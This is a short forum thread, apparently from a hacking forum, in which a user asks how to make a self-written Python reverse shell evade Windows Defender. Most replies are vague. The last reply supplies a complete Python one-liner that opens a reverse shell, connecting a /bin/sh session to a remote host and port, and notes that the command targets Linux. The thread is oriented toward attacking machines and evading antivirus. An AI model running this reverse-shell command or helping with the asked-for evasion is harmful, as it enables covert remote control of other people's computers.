Python Reverse shell
by - Thursday, January 1, 1970 at 12:00 AM
Would a self-coded reverse shell executable written in python could evade windows defender of updated windows systems? 
:exclamation:
If not, How can i make it evade windows defender?
Reply
You would need something different
:pomlove:  @Rayzers   :pomlove: 
Reply
(November 26, 2022, 02:55 PM)pipe Wrote: You would need something different

Like what ?
Reply
(November 26, 2022, 03:29 PM)d3stiny255 Wrote:
(November 26, 2022, 02:55 PM)pipe Wrote: You would need something different

Like what ?


really depends
:pomlove:  @Rayzers   :pomlove: 
Reply
(November 26, 2022, 03:32 PM)pipe Wrote:
(November 26, 2022, 03:29 PM)d3stiny255 Wrote:
(November 26, 2022, 02:55 PM)pipe Wrote: You would need something different

Like what ?


really depends

huh?
Reply
this is very simple bro also shared before
Reply
Setup a test VM and just try! Example one-liner:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


That's for Linux targets. If you want to target Windows, Python is not standard installed. So will not work on a normal box.
Reply


 Users viewing this thread: Python Reverse shell: No users currently viewing.